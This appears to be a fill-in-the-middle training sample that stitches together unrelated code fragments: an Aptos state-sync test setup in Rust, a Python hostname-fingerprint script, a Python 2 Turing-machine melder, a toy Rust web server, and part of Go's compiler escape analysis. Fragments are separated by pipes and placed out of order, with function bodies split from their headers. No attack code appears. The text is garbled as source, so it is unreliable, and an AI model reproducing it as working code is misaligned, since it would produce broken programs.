let (db, db_rw) = DbReaderWriter::wrap(AptosDB::new_for_test(db_path.path()));
// Bootstrap the genesis transaction
let (genesis, _) = vm_genesis::test_genesis_change_set_and_validators(Some(1));
let genesis_txn = Transaction::GenesisTransaction(WriteSetPayload::Direct(genesis));
bootstrap_genesis::<AptosVM>(&db_rw, &genesis_txn).unwrap();
// Create the event subscription service and subscribe to events and reconfigurations
let storage: Arc<dyn DbReader> = db;
let synced_version = (&*storage).fetch_latest_state_checkpoint_version().unwrap();
let mut event_subscription_service = EventSubscriptionService::new(
ON_CHAIN_CONFIG_REGISTRY,
Arc::new(RwLock::new(db_rw.clone())),
);
let mut reconfiguration_subscriber = event_subscription_service
.subscribe_to_reconfigurations()
.unwrap();
let event_key_subscriptions =
event_key_subscriptions.unwrap_or_else(|| vec![EventKey::random()]);
let event_subscriber = event_subscription_service
.subscribe_to_events(event_key_subscriptions)
.unwrap();
// Notify subscribers of the initial configs
event_subscription_service
.notify_initial_configs(synced_version)
.unwrap();
reconfiguration_subscriber.select_next_some().await;
// Create consensus and mempool notifiers and listeners
let (consensus_notifier, consensus_listener) =
consensus_notifications::new_consensus_notifier_listener_pair(5000);
let (mempool_notifier, mempool_listener) =
mempool_notifications::new_mempool_notifier_listener_pair();
// Create the chunk executor
let chunk_executor = Arc::new(ChunkExecutor::<AptosVM>::new(db_rw.clone()).unwrap());
// Create a streaming service client
let (streaming_service_client, _) = new_streaming_service_client_listener_pair();
// Create a test aptos data client
let network_client = StorageServiceClient::new(
MultiNetworkSender::new(HashMap::new()),
PeerMetadataStorage::new(&[]),
);
let (aptos_data_client, _) = AptosNetDataClient::new(
node_config.state_sync.aptos_data_client,
node_config.state_sync.storage_service,
TimeService::mock(),
network_client,
None,
);
// Create and spawn the driver
let driver_factory = DriverFactory::create_and_spawn_driver(
false,
&node_config,
waypoint,
db_rw,
chunk_executor,
mempool_notifier,
consensus_listener,
event_subscription_service,
aptos_data_client,
streaming_service_client,
);
(
driver_factory,
consensus_notifier,
mempool_listener,
reconfiguration_subscriber,
event_subscriber,
)
} | ) {
let mut node_config = NodeConfig::default();
node_config.base.role = RoleType::Validator; |
make_fingerprint.py | #!/usr/bin/env python3
import codecs
import hashlib
import random_tweets
import requests
import sys
def | (url):
host = requests.urllib3.util.url.parse_url(url).host
if host is None:
host = '-INVALID-'
fingerprint = hashlib.md5(host.encode('utf-8')).hexdigest()
comment = codecs.getencoder('base64')(host.encode('utf-8'))[0].decode('ascii').rstrip('\n=')
return host, fingerprint, comment
def run(args):
if len(args) == 0:
print('Usage: {} <HOSTNAMES...>'.format(sys.argv[0]), file=sys.stderr)
return 1
for url in args:
host, fingerprint, comment = make_fingerprint(url)
#print(" '{f}', # {c}, {h}"
print(" '{f}', # {c}"
.format(u=url, h=host, f=fingerprint, c=comment))
return 0
if __name__ == '__main__':
exit(run(sys.argv[1:]))
| make_fingerprint |
tmmelder.py | # This program melds together two Turing machines;
# that is, if the first machine ends up in an "OUT" state,
# this program outputs a TM where the out state of the first machine
# is the start state of the second
import sys
import tmsim
def alphabetMSToTS():
|
def convertStatesToString(listOfStates, output):
numberOfStates = len(listOfStates)
output.write("States: " + str(numberOfStates) + "\n")
output.write("\n")
statesIveAlreadyPrinted = {}
for state in listOfStates:
try:
assert (not state.stateName in statesIveAlreadyPrinted)
except AssertionError:
print state.stateName
raise
statesIveAlreadyPrinted[state.stateName] = None
if state.isStartState:
output.write("START ")
output.write(state.stateName + ":\n")
for symbol in alphabetMSToTS():
output.write("\t" + symbol + " -> " + state.getNextStateName(symbol) + "; " + \
state.getHeadMove(symbol) + "; " + state.getWrite(symbol) + "\n")
output.write("\n")
if __name__ == "__main__":
inMachineName = sys.argv[1]
outMachineName = sys.argv[2]
try:
assert inMachineName != outMachineName
except:
print "Error: cannot meld two machines that have the same name."
raise
inMachine = tmsim.SingleTapeTuringMachine("../tm2_files/" + sys.argv[1] + ".tm2", \
alphabetMSToTS())
outMachine = tmsim.SingleTapeTuringMachine("../tm2_files/" + sys.argv[2] + ".tm2", \
alphabetMSToTS())
for state in inMachine.listOfRealStates:
for symbol in alphabetMSToTS():
nextState = state.getNextState(symbol)
if nextState.stateName == "OUT":
state.setNextState(symbol, outMachine.startState)
for state in outMachine.listOfRealStates:
state.isStartState = False
convertStatesToString(inMachine.listOfRealStates + outMachine.listOfRealStates, \
open("../tm2_files/" + sys.argv[3] + ".tm2", "w")) | return ["a", "b"] |
main.rs | use std::fs;
use std::io::prelude::*;
use std::net::TcpListener;
use std::net::TcpStream;
use std::thread;
use std::time::Duration;
use hello_web::ThreadPool;
fn main() {
let listener = TcpListener::bind("127.0.0.1:7878").unwrap();
let pool = ThreadPool::new(4);
for stream in listener.incoming().take(2) {
let stream = stream.unwrap();
pool.execute(|| {
handle_connection(stream);
});
}
println!("Shutting down.");
}
fn handle_connection(mut stream: TcpStream) {
let mut buffer = [0; 1024];
stream.read(&mut buffer).unwrap();
let get = b"GET / HTTP/1.1\r\n";
let sleep = b"GET /sleep HTTP/1.1\r\n";
let (status_line, filename) = if buffer.starts_with(get) {
("HTTP/1.1 200 OK", "hello.html")
} else if buffer.starts_with(sleep) {
thread::sleep(Duration::from_secs(5));
("HTTP/1.1 200 OK", "hello.html")
} else {
("HTTP/1.1 404 NOT FOUND", "404.html")
};
let contents = fs::read_to_string(filename).unwrap();
let response = format!(
"{}\r\nContent-Length: {}\r\n\r\n{}",
status_line,
contents.len(), | stream.write(response.as_bytes()).unwrap();
stream.flush().unwrap();
} | contents
);
|
escape.go | // Copyright 2018 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package gc
import (
"cmd/compile/internal/logopt"
"cmd/compile/internal/types"
"cmd/internal/src"
"fmt"
"math"
"strings"
)
// Escape analysis.
//
// Here we analyze functions to determine which Go variables
// (including implicit allocations such as calls to "new" or "make",
// composite literals, etc.) can be allocated on the stack. The two
// key invariants we have to ensure are: (1) pointers to stack objects
// cannot be stored in the heap, and (2) pointers to a stack object
// cannot outlive that object (e.g., because the declaring function
// returned and destroyed the object's stack frame, or its space is
// reused across loop iterations for logically distinct variables).
//
// We implement this with a static data-flow analysis of the AST.
// First, we construct a directed weighted graph where vertices
// (termed "locations") represent variables allocated by statements
// and expressions, and edges represent assignments between variables
// (with weights representing addressing/dereference counts).
//
// Next we walk the graph looking for assignment paths that might
// violate the invariants stated above. If a variable v's address is
// stored in the heap or elsewhere that may outlive it, then v is
// marked as requiring heap allocation.
//
// To support interprocedural analysis, we also record data-flow from
// each function's parameters to the heap and to its result
// parameters. This information is summarized as "parameter tags",
// which are used at static call sites to improve escape analysis of
// function arguments.
// Constructing the location graph.
//
// Every allocating statement (e.g., variable declaration) or
// expression (e.g., "new" or "make") is first mapped to a unique
// "location."
//
// We also model every Go assignment as a directed edges between
// locations. The number of dereference operations minus the number of
// addressing operations is recorded as the edge's weight (termed
// "derefs"). For example:
//
// p = &q // -1
// p = q // 0
// p = *q // 1
// p = **q // 2
//
// p = **&**&q // 2
//
// Note that the & operator can only be applied to addressable
// expressions, and the expression &x itself is not addressable, so
// derefs cannot go below -1.
//
// Every Go language construct is lowered into this representation,
// generally without sensitivity to flow, path, or context; and
// without distinguishing elements within a compound variable. For
// example:
//
// var x struct { f, g *int }
// var u []*int
//
// x.f = u[0]
//
// is modeled simply as
//
// x = *u
//
// That is, we don't distinguish x.f from x.g, or u[0] from u[1],
// u[2], etc. However, we do record the implicit dereference involved
// in indexing a slice.
type Escape struct {
allLocs []*EscLocation
curfn *Node
// loopDepth counts the current loop nesting depth within
// curfn. It increments within each "for" loop and at each
// label with a corresponding backwards "goto" (i.e.,
// unstructured loop).
loopDepth int
heapLoc EscLocation
blankLoc EscLocation
}
// An EscLocation represents an abstract location that stores a Go
// variable.
type EscLocation struct {
n *Node // represented variable or expression, if any
curfn *Node // enclosing function
edges []EscEdge // incoming edges
loopDepth int // loopDepth at declaration
// derefs and walkgen are used during walkOne to track the
// minimal dereferences from the walk root.
derefs int // >= -1
walkgen uint32
// dst and dstEdgeindex track the next immediate assignment
// destination location during walkone, along with the index
// of the edge pointing back to this location.
dst *EscLocation
dstEdgeIdx int
// queued is used by walkAll to track whether this location is
// in the walk queue.
queued bool
// escapes reports whether the represented variable's address
// escapes; that is, whether the variable must be heap
// allocated.
escapes bool
// transient reports whether the represented expression's
// address does not outlive the statement; that is, whether
// its storage can be immediately reused.
transient bool
// paramEsc records the represented parameter's leak set.
paramEsc EscLeaks
}
// An EscEdge represents an assignment edge between two Go variables.
type EscEdge struct {
src *EscLocation
derefs int // >= -1
notes *EscNote
}
// escapeFuncs performs escape analysis on a minimal batch of
// functions.
func escapeFuncs(fns []*Node, recursive bool) {
for _, fn := range fns {
if fn.Op != ODCLFUNC {
Fatalf("unexpected node: %v", fn)
}
}
var e Escape
e.heapLoc.escapes = true
// Construct data-flow graph from syntax trees.
for _, fn := range fns {
e.initFunc(fn)
}
for _, fn := range fns {
e.walkFunc(fn)
}
e.curfn = nil
e.walkAll()
e.finish(fns)
}
func (e *Escape) initFunc(fn *Node) {
if fn.Op != ODCLFUNC || fn.Esc != EscFuncUnknown {
Fatalf("unexpected node: %v", fn)
}
fn.Esc = EscFuncPlanned
if Debug.m > 3 {
Dump("escAnalyze", fn)
}
e.curfn = fn
e.loopDepth = 1
// Allocate locations for local variables.
for _, dcl := range fn.Func.Dcl {
if dcl.Op == ONAME {
e.newLoc(dcl, false)
}
}
}
func (e *Escape) walkFunc(fn *Node) {
fn.Esc = EscFuncStarted
// Identify labels that mark the head of an unstructured loop.
inspectList(fn.Nbody, func(n *Node) bool {
switch n.Op {
case OLABEL:
n.Sym.Label = asTypesNode(&nonlooping)
case OGOTO:
// If we visited the label before the goto,
// then this is a looping label.
if n.Sym.Label == asTypesNode(&nonlooping) {
n.Sym.Label = asTypesNode(&looping)
}
}
return true
})
e.curfn = fn
e.loopDepth = 1
e.block(fn.Nbody)
}
// Below we implement the methods for walking the AST and recording
// data flow edges. Note that because a sub-expression might have
// side-effects, it's important to always visit the entire AST.
//
// For example, write either:
//
// if x {
// e.discard(n.Left)
// } else {
// e.value(k, n.Left)
// }
//
// or
//
// if x {
// k = e.discardHole()
// }
// e.value(k, n.Left)
//
// Do NOT write:
//
// // BAD: possibly loses side-effects within n.Left | // }
// stmt evaluates a single Go statement.
func (e *Escape) stmt(n *Node) {
if n == nil {
return
}
lno := setlineno(n)
defer func() {
lineno = lno
}()
if Debug.m > 2 {
fmt.Printf("%v:[%d] %v stmt: %v\n", linestr(lineno), e.loopDepth, funcSym(e.curfn), n)
}
e.stmts(n.Ninit)
switch n.Op {
default:
Fatalf("unexpected stmt: %v", n)
case ODCLCONST, ODCLTYPE, OEMPTY, OFALL, OINLMARK:
// nop
case OBREAK, OCONTINUE, OGOTO:
// TODO(mdempsky): Handle dead code?
case OBLOCK:
e.stmts(n.List)
case ODCL:
// Record loop depth at declaration.
if !n.Left.isBlank() {
e.dcl(n.Left)
}
case OLABEL:
switch asNode(n.Sym.Label) {
case &nonlooping:
if Debug.m > 2 {
fmt.Printf("%v:%v non-looping label\n", linestr(lineno), n)
}
case &looping:
if Debug.m > 2 {
fmt.Printf("%v: %v looping label\n", linestr(lineno), n)
}
e.loopDepth++
default:
Fatalf("label missing tag")
}
n.Sym.Label = nil
case OIF:
e.discard(n.Left)
e.block(n.Nbody)
e.block(n.Rlist)
case OFOR, OFORUNTIL:
e.loopDepth++
e.discard(n.Left)
e.stmt(n.Right)
e.block(n.Nbody)
e.loopDepth--
case ORANGE:
// for List = range Right { Nbody }
e.loopDepth++
ks := e.addrs(n.List)
e.block(n.Nbody)
e.loopDepth--
// Right is evaluated outside the loop.
k := e.discardHole()
if len(ks) >= 2 {
if n.Right.Type.IsArray() {
k = ks[1].note(n, "range")
} else {
k = ks[1].deref(n, "range-deref")
}
}
e.expr(e.later(k), n.Right)
case OSWITCH:
typesw := n.Left != nil && n.Left.Op == OTYPESW
var ks []EscHole
for _, cas := range n.List.Slice() { // cases
if typesw && n.Left.Left != nil {
cv := cas.Rlist.First()
k := e.dcl(cv) // type switch variables have no ODCL.
if cv.Type.HasPointers() {
ks = append(ks, k.dotType(cv.Type, cas, "switch case"))
}
}
e.discards(cas.List)
e.block(cas.Nbody)
}
if typesw {
e.expr(e.teeHole(ks...), n.Left.Right)
} else {
e.discard(n.Left)
}
case OSELECT:
for _, cas := range n.List.Slice() {
e.stmt(cas.Left)
e.block(cas.Nbody)
}
case OSELRECV:
e.assign(n.Left, n.Right, "selrecv", n)
case OSELRECV2:
e.assign(n.Left, n.Right, "selrecv", n)
e.assign(n.List.First(), nil, "selrecv", n)
case ORECV:
// TODO(mdempsky): Consider e.discard(n.Left).
e.exprSkipInit(e.discardHole(), n) // already visited n.Ninit
case OSEND:
e.discard(n.Left)
e.assignHeap(n.Right, "send", n)
case OAS, OASOP:
e.assign(n.Left, n.Right, "assign", n)
case OAS2:
for i, nl := range n.List.Slice() {
e.assign(nl, n.Rlist.Index(i), "assign-pair", n)
}
case OAS2DOTTYPE: // v, ok = x.(type)
e.assign(n.List.First(), n.Right, "assign-pair-dot-type", n)
e.assign(n.List.Second(), nil, "assign-pair-dot-type", n)
case OAS2MAPR: // v, ok = m[k]
e.assign(n.List.First(), n.Right, "assign-pair-mapr", n)
e.assign(n.List.Second(), nil, "assign-pair-mapr", n)
case OAS2RECV: // v, ok = <-ch
e.assign(n.List.First(), n.Right, "assign-pair-receive", n)
e.assign(n.List.Second(), nil, "assign-pair-receive", n)
case OAS2FUNC:
e.stmts(n.Right.Ninit)
e.call(e.addrs(n.List), n.Right, nil)
case ORETURN:
results := e.curfn.Type.Results().FieldSlice()
for i, v := range n.List.Slice() {
e.assign(asNode(results[i].Nname), v, "return", n)
}
case OCALLFUNC, OCALLMETH, OCALLINTER, OCLOSE, OCOPY, ODELETE, OPANIC, OPRINT, OPRINTN, ORECOVER:
e.call(nil, n, nil)
case OGO, ODEFER:
e.stmts(n.Left.Ninit)
e.call(nil, n.Left, n)
case ORETJMP:
// TODO(mdempsky): What do? esc.go just ignores it.
}
}
func (e *Escape) stmts(l Nodes) {
for _, n := range l.Slice() {
e.stmt(n)
}
}
// block is like stmts, but preserves loopDepth.
func (e *Escape) block(l Nodes) {
old := e.loopDepth
e.stmts(l)
e.loopDepth = old
}
// expr models evaluating an expression n and flowing the result into
// hole k.
func (e *Escape) expr(k EscHole, n *Node) {
if n == nil {
return
}
e.stmts(n.Ninit)
e.exprSkipInit(k, n)
}
func (e *Escape) exprSkipInit(k EscHole, n *Node) {
if n == nil {
return
}
lno := setlineno(n)
defer func() {
lineno = lno
}()
uintptrEscapesHack := k.uintptrEscapesHack
k.uintptrEscapesHack = false
if uintptrEscapesHack && n.Op == OCONVNOP && n.Left.Type.IsUnsafePtr() {
// nop
} else if k.derefs >= 0 && !n.Type.HasPointers() {
k = e.discardHole()
}
switch n.Op {
default:
Fatalf("unexpected expr: %v", n)
case OLITERAL, OGETG, OCLOSUREVAR, OTYPE:
// nop
case ONAME:
if n.Class() == PFUNC || n.Class() == PEXTERN {
return
}
e.flow(k, e.oldLoc(n))
case OPLUS, ONEG, OBITNOT, ONOT:
e.discard(n.Left)
case OADD, OSUB, OOR, OXOR, OMUL, ODIV, OMOD, OLSH, ORSH, OAND, OANDNOT, OEQ, ONE, OLT, OLE, OGT, OGE, OANDAND, OOROR:
e.discard(n.Left)
e.discard(n.Right)
case OADDR:
e.expr(k.addr(n, "address-of"), n.Left) // "address-of"
case ODEREF:
e.expr(k.deref(n, "indirection"), n.Left) // "indirection"
case ODOT, ODOTMETH, ODOTINTER:
e.expr(k.note(n, "dot"), n.Left)
case ODOTPTR:
e.expr(k.deref(n, "dot of pointer"), n.Left) // "dot of pointer"
case ODOTTYPE, ODOTTYPE2:
e.expr(k.dotType(n.Type, n, "dot"), n.Left)
case OINDEX:
if n.Left.Type.IsArray() {
e.expr(k.note(n, "fixed-array-index-of"), n.Left)
} else {
// TODO(mdempsky): Fix why reason text.
e.expr(k.deref(n, "dot of pointer"), n.Left)
}
e.discard(n.Right)
case OINDEXMAP:
e.discard(n.Left)
e.discard(n.Right)
case OSLICE, OSLICEARR, OSLICE3, OSLICE3ARR, OSLICESTR:
e.expr(k.note(n, "slice"), n.Left)
low, high, max := n.SliceBounds()
e.discard(low)
e.discard(high)
e.discard(max)
case OCONV, OCONVNOP:
if checkPtr(e.curfn, 2) && n.Type.IsUnsafePtr() && n.Left.Type.IsPtr() {
// When -d=checkptr=2 is enabled, treat
// conversions to unsafe.Pointer as an
// escaping operation. This allows better
// runtime instrumentation, since we can more
// easily detect object boundaries on the heap
// than the stack.
e.assignHeap(n.Left, "conversion to unsafe.Pointer", n)
} else if n.Type.IsUnsafePtr() && n.Left.Type.IsUintptr() {
e.unsafeValue(k, n.Left)
} else {
e.expr(k, n.Left)
}
case OCONVIFACE:
if !n.Left.Type.IsInterface() && !isdirectiface(n.Left.Type) {
k = e.spill(k, n)
}
e.expr(k.note(n, "interface-converted"), n.Left)
case ORECV:
e.discard(n.Left)
case OCALLMETH, OCALLFUNC, OCALLINTER, OLEN, OCAP, OCOMPLEX, OREAL, OIMAG, OAPPEND, OCOPY:
e.call([]EscHole{k}, n, nil)
case ONEW:
e.spill(k, n)
case OMAKESLICE:
e.spill(k, n)
e.discard(n.Left)
e.discard(n.Right)
case OMAKECHAN:
e.discard(n.Left)
case OMAKEMAP:
e.spill(k, n)
e.discard(n.Left)
case ORECOVER:
// nop
case OCALLPART:
// Flow the receiver argument to both the closure and
// to the receiver parameter.
closureK := e.spill(k, n)
m := callpartMethod(n)
// We don't know how the method value will be called
// later, so conservatively assume the result
// parameters all flow to the heap.
//
// TODO(mdempsky): Change ks into a callback, so that
// we don't have to create this dummy slice?
var ks []EscHole
for i := m.Type.NumResults(); i > 0; i-- {
ks = append(ks, e.heapHole())
}
paramK := e.tagHole(ks, asNode(m.Type.Nname()), m.Type.Recv())
e.expr(e.teeHole(paramK, closureK), n.Left)
case OPTRLIT:
e.expr(e.spill(k, n), n.Left)
case OARRAYLIT:
for _, elt := range n.List.Slice() {
if elt.Op == OKEY {
elt = elt.Right
}
e.expr(k.note(n, "array literal element"), elt)
}
case OSLICELIT:
k = e.spill(k, n)
k.uintptrEscapesHack = uintptrEscapesHack // for ...uintptr parameters
for _, elt := range n.List.Slice() {
if elt.Op == OKEY {
elt = elt.Right
}
e.expr(k.note(n, "slice-literal-element"), elt)
}
case OSTRUCTLIT:
for _, elt := range n.List.Slice() {
e.expr(k.note(n, "struct literal element"), elt.Left)
}
case OMAPLIT:
e.spill(k, n)
// Map keys and values are always stored in the heap.
for _, elt := range n.List.Slice() {
e.assignHeap(elt.Left, "map literal key", n)
e.assignHeap(elt.Right, "map literal value", n)
}
case OCLOSURE:
k = e.spill(k, n)
// Link addresses of captured variables to closure.
for _, v := range n.Func.Closure.Func.Cvars.Slice() {
if v.Op == OXXX { // unnamed out argument; see dcl.go:/^funcargs
continue
}
k := k
if !v.Name.Byval() {
k = k.addr(v, "reference")
}
e.expr(k.note(n, "captured by a closure"), v.Name.Defn)
}
case ORUNES2STR, OBYTES2STR, OSTR2RUNES, OSTR2BYTES, ORUNESTR:
e.spill(k, n)
e.discard(n.Left)
case OADDSTR:
e.spill(k, n)
// Arguments of OADDSTR never escape;
// runtime.concatstrings makes sure of that.
e.discards(n.List)
}
}
// unsafeValue evaluates a uintptr-typed arithmetic expression looking
// for conversions from an unsafe.Pointer.
func (e *Escape) unsafeValue(k EscHole, n *Node) {
if n.Type.Etype != TUINTPTR {
Fatalf("unexpected type %v for %v", n.Type, n)
}
e.stmts(n.Ninit)
switch n.Op {
case OCONV, OCONVNOP:
if n.Left.Type.IsUnsafePtr() {
e.expr(k, n.Left)
} else {
e.discard(n.Left)
}
case ODOTPTR:
if isReflectHeaderDataField(n) {
e.expr(k.deref(n, "reflect.Header.Data"), n.Left)
} else {
e.discard(n.Left)
}
case OPLUS, ONEG, OBITNOT:
e.unsafeValue(k, n.Left)
case OADD, OSUB, OOR, OXOR, OMUL, ODIV, OMOD, OAND, OANDNOT:
e.unsafeValue(k, n.Left)
e.unsafeValue(k, n.Right)
case OLSH, ORSH:
e.unsafeValue(k, n.Left)
// RHS need not be uintptr-typed (#32959) and can't meaningfully
// flow pointers anyway.
e.discard(n.Right)
default:
e.exprSkipInit(e.discardHole(), n)
}
}
// discard evaluates an expression n for side-effects, but discards
// its value.
func (e *Escape) discard(n *Node) {
e.expr(e.discardHole(), n)
}
func (e *Escape) discards(l Nodes) {
for _, n := range l.Slice() {
e.discard(n)
}
}
// addr evaluates an addressable expression n and returns an EscHole
// that represents storing into the represented location.
func (e *Escape) addr(n *Node) EscHole {
if n == nil || n.isBlank() {
// Can happen at least in OSELRECV.
// TODO(mdempsky): Anywhere else?
return e.discardHole()
}
k := e.heapHole()
switch n.Op {
default:
Fatalf("unexpected addr: %v", n)
case ONAME:
if n.Class() == PEXTERN {
break
}
k = e.oldLoc(n).asHole()
case ODOT:
k = e.addr(n.Left)
case OINDEX:
e.discard(n.Right)
if n.Left.Type.IsArray() {
k = e.addr(n.Left)
} else {
e.discard(n.Left)
}
case ODEREF, ODOTPTR:
e.discard(n)
case OINDEXMAP:
e.discard(n.Left)
e.assignHeap(n.Right, "key of map put", n)
}
if !n.Type.HasPointers() {
k = e.discardHole()
}
return k
}
func (e *Escape) addrs(l Nodes) []EscHole {
var ks []EscHole
for _, n := range l.Slice() {
ks = append(ks, e.addr(n))
}
return ks
}
// assign evaluates the assignment dst = src.
func (e *Escape) assign(dst, src *Node, why string, where *Node) {
// Filter out some no-op assignments for escape analysis.
ignore := dst != nil && src != nil && isSelfAssign(dst, src)
if ignore && Debug.m != 0 {
Warnl(where.Pos, "%v ignoring self-assignment in %S", funcSym(e.curfn), where)
}
k := e.addr(dst)
if dst != nil && dst.Op == ODOTPTR && isReflectHeaderDataField(dst) {
e.unsafeValue(e.heapHole().note(where, why), src)
} else {
if ignore {
k = e.discardHole()
}
e.expr(k.note(where, why), src)
}
}
func (e *Escape) assignHeap(src *Node, why string, where *Node) {
e.expr(e.heapHole().note(where, why), src)
}
// call evaluates a call expressions, including builtin calls. ks
// should contain the holes representing where the function callee's
// results flows; where is the OGO/ODEFER context of the call, if any.
func (e *Escape) call(ks []EscHole, call, where *Node) {
topLevelDefer := where != nil && where.Op == ODEFER && e.loopDepth == 1
if topLevelDefer {
// force stack allocation of defer record, unless
// open-coded defers are used (see ssa.go)
where.Esc = EscNever
}
argument := func(k EscHole, arg *Node) {
if topLevelDefer {
// Top level defers arguments don't escape to
// heap, but they do need to last until end of
// function.
k = e.later(k)
} else if where != nil {
k = e.heapHole()
}
e.expr(k.note(call, "call parameter"), arg)
}
switch call.Op {
default:
Fatalf("unexpected call op: %v", call.Op)
case OCALLFUNC, OCALLMETH, OCALLINTER:
fixVariadicCall(call)
// Pick out the function callee, if statically known.
var fn *Node
switch call.Op {
case OCALLFUNC:
switch v := staticValue(call.Left); {
case v.Op == ONAME && v.Class() == PFUNC:
fn = v
case v.Op == OCLOSURE:
fn = v.Func.Closure.Func.Nname
}
case OCALLMETH:
fn = asNode(call.Left.Type.FuncType().Nname)
}
fntype := call.Left.Type
if fn != nil {
fntype = fn.Type
}
if ks != nil && fn != nil && e.inMutualBatch(fn) {
for i, result := range fn.Type.Results().FieldSlice() {
e.expr(ks[i], asNode(result.Nname))
}
}
if r := fntype.Recv(); r != nil {
argument(e.tagHole(ks, fn, r), call.Left.Left)
} else {
// Evaluate callee function expression.
argument(e.discardHole(), call.Left)
}
args := call.List.Slice()
for i, param := range fntype.Params().FieldSlice() {
argument(e.tagHole(ks, fn, param), args[i])
}
case OAPPEND:
args := call.List.Slice()
// Appendee slice may flow directly to the result, if
// it has enough capacity. Alternatively, a new heap
// slice might be allocated, and all slice elements
// might flow to heap.
appendeeK := ks[0]
if args[0].Type.Elem().HasPointers() {
appendeeK = e.teeHole(appendeeK, e.heapHole().deref(call, "appendee slice"))
}
argument(appendeeK, args[0])
if call.IsDDD() {
appendedK := e.discardHole()
if args[1].Type.IsSlice() && args[1].Type.Elem().HasPointers() {
appendedK = e.heapHole().deref(call, "appended slice...")
}
argument(appendedK, args[1])
} else {
for _, arg := range args[1:] {
argument(e.heapHole(), arg)
}
}
case OCOPY:
argument(e.discardHole(), call.Left)
copiedK := e.discardHole()
if call.Right.Type.IsSlice() && call.Right.Type.Elem().HasPointers() {
copiedK = e.heapHole().deref(call, "copied slice")
}
argument(copiedK, call.Right)
case OPANIC:
argument(e.heapHole(), call.Left)
case OCOMPLEX:
argument(e.discardHole(), call.Left)
argument(e.discardHole(), call.Right)
case ODELETE, OPRINT, OPRINTN, ORECOVER:
for _, arg := range call.List.Slice() {
argument(e.discardHole(), arg)
}
case OLEN, OCAP, OREAL, OIMAG, OCLOSE:
argument(e.discardHole(), call.Left)
}
}
// tagHole returns a hole for evaluating an argument passed to param.
// ks should contain the holes representing where the function
// callee's results flows. fn is the statically-known callee function,
// if any.
func (e *Escape) tagHole(ks []EscHole, fn *Node, param *types.Field) EscHole {
// If this is a dynamic call, we can't rely on param.Note.
if fn == nil {
return e.heapHole()
}
if e.inMutualBatch(fn) {
return e.addr(asNode(param.Nname))
}
// Call to previously tagged function.
if param.Note == uintptrEscapesTag {
k := e.heapHole()
k.uintptrEscapesHack = true
return k
}
var tagKs []EscHole
esc := ParseLeaks(param.Note)
if x := esc.Heap(); x >= 0 {
tagKs = append(tagKs, e.heapHole().shift(x))
}
if ks != nil {
for i := 0; i < numEscResults; i++ {
if x := esc.Result(i); x >= 0 {
tagKs = append(tagKs, ks[i].shift(x))
}
}
}
return e.teeHole(tagKs...)
}
// inMutualBatch reports whether function fn is in the batch of
// mutually recursive functions being analyzed. When this is true,
// fn has not yet been analyzed, so its parameters and results
// should be incorporated directly into the flow graph instead of
// relying on its escape analysis tagging.
func (e *Escape) inMutualBatch(fn *Node) bool {
if fn.Name.Defn != nil && fn.Name.Defn.Esc < EscFuncTagged {
if fn.Name.Defn.Esc == EscFuncUnknown {
Fatalf("graph inconsistency")
}
return true
}
return false
}
// An EscHole represents a context for evaluation a Go
// expression. E.g., when evaluating p in "x = **p", we'd have a hole
// with dst==x and derefs==2.
type EscHole struct {
dst *EscLocation
derefs int // >= -1
notes *EscNote
// uintptrEscapesHack indicates this context is evaluating an
// argument for a //go:uintptrescapes function.
uintptrEscapesHack bool
}
type EscNote struct {
next *EscNote
where *Node
why string
}
func (k EscHole) note(where *Node, why string) EscHole {
if where == nil || why == "" {
Fatalf("note: missing where/why")
}
if Debug.m >= 2 || logopt.Enabled() {
k.notes = &EscNote{
next: k.notes,
where: where,
why: why,
}
}
return k
}
func (k EscHole) shift(delta int) EscHole {
k.derefs += delta
if k.derefs < -1 {
Fatalf("derefs underflow: %v", k.derefs)
}
return k
}
func (k EscHole) deref(where *Node, why string) EscHole { return k.shift(1).note(where, why) }
func (k EscHole) addr(where *Node, why string) EscHole { return k.shift(-1).note(where, why) }
func (k EscHole) dotType(t *types.Type, where *Node, why string) EscHole {
if !t.IsInterface() && !isdirectiface(t) {
k = k.shift(1)
}
return k.note(where, why)
}
// teeHole returns a new hole that flows into each hole of ks,
// similar to the Unix tee(1) command.
func (e *Escape) teeHole(ks ...EscHole) EscHole {
if len(ks) == 0 {
return e.discardHole()
}
if len(ks) == 1 {
return ks[0]
}
// TODO(mdempsky): Optimize if there's only one non-discard hole?
// Given holes "l1 = _", "l2 = **_", "l3 = *_", ..., create a
// new temporary location ltmp, wire it into place, and return
// a hole for "ltmp = _".
loc := e.newLoc(nil, true)
for _, k := range ks {
// N.B., "p = &q" and "p = &tmp; tmp = q" are not
// semantically equivalent. To combine holes like "l1
// = _" and "l2 = &_", we'd need to wire them as "l1 =
// *ltmp" and "l2 = ltmp" and return "ltmp = &_"
// instead.
if k.derefs < 0 {
Fatalf("teeHole: negative derefs")
}
e.flow(k, loc)
}
return loc.asHole()
}
func (e *Escape) dcl(n *Node) EscHole {
loc := e.oldLoc(n)
loc.loopDepth = e.loopDepth
return loc.asHole()
}
// spill allocates a new location associated with expression n, flows
// its address to k, and returns a hole that flows values to it. It's
// intended for use with most expressions that allocate storage.
func (e *Escape) spill(k EscHole, n *Node) EscHole {
loc := e.newLoc(n, true)
e.flow(k.addr(n, "spill"), loc)
return loc.asHole()
}
// later returns a new hole that flows into k, but some time later.
// Its main effect is to prevent immediate reuse of temporary
// variables introduced during Order.
func (e *Escape) later(k EscHole) EscHole {
loc := e.newLoc(nil, false)
e.flow(k, loc)
return loc.asHole()
}
// canonicalNode returns the canonical *Node that n logically
// represents.
func canonicalNode(n *Node) *Node {
if n != nil && n.Op == ONAME && n.Name.IsClosureVar() {
n = n.Name.Defn
if n.Name.IsClosureVar() {
Fatalf("still closure var")
}
}
return n
}
func (e *Escape) newLoc(n *Node, transient bool) *EscLocation {
if e.curfn == nil {
Fatalf("e.curfn isn't set")
}
if n != nil && n.Type != nil && n.Type.NotInHeap() {
yyerrorl(n.Pos, "%v is incomplete (or unallocatable); stack allocation disallowed", n.Type)
}
n = canonicalNode(n)
loc := &EscLocation{
n: n,
curfn: e.curfn,
loopDepth: e.loopDepth,
transient: transient,
}
e.allLocs = append(e.allLocs, loc)
if n != nil {
if n.Op == ONAME && n.Name.Curfn != e.curfn {
Fatalf("curfn mismatch: %v != %v", n.Name.Curfn, e.curfn)
}
if n.HasOpt() {
Fatalf("%v already has a location", n)
}
n.SetOpt(loc)
if why := heapAllocReason(n); why != "" {
e.flow(e.heapHole().addr(n, why), loc)
}
}
return loc
}
func (e *Escape) oldLoc(n *Node) *EscLocation {
n = canonicalNode(n)
return n.Opt().(*EscLocation)
}
